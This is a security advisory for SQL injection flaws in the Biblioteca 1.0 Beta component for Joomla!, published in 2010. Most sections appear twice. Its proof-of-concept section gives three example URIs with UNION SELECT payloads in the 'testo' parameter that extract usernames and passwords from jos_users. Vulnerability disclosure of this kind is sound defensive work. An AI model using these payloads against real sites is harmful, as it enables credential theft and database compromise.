Joomla! Biblioteca Component 'testo' Parameter Multiple SQL Injection Vulnerabilities
BID:42603
Info
Joomla! Biblioteca Component 'testo' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 42603 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 23 2010 12:00AM |
| Updated: | Aug 23 2010 12:00AM |
| Credit: | Salvatore Fresta aka Drosophila |
| Vulnerable: |
Tedeschi Alessio Biblioteca 1.0 Beta |
| Not Vulnerable: | |
Discussion
Joomla! Biblioteca Component 'testo' Parameter Multiple SQL Injection Vulnerabilities
The Biblioteca component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Biblioteca 1.0 Beta is vulnerable; other versions may also be affected.
The Biblioteca component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Biblioteca 1.0 Beta is vulnerable; other versions may also be affected.
Exploit / POC
Joomla! Biblioteca Component 'testo' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://www.example.com/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://www.example.com/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://www.example.com/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://www.example.com/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
Solution / Fix
Joomla! Biblioteca Component 'testo' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Joomla! Biblioteca Component 'testo' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- Biblioteca Homepage (Tedeschi Alessio)
- Joomla! Homepage (Joomla!)
- Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities (Salvatore Fresta aka Drosophila
)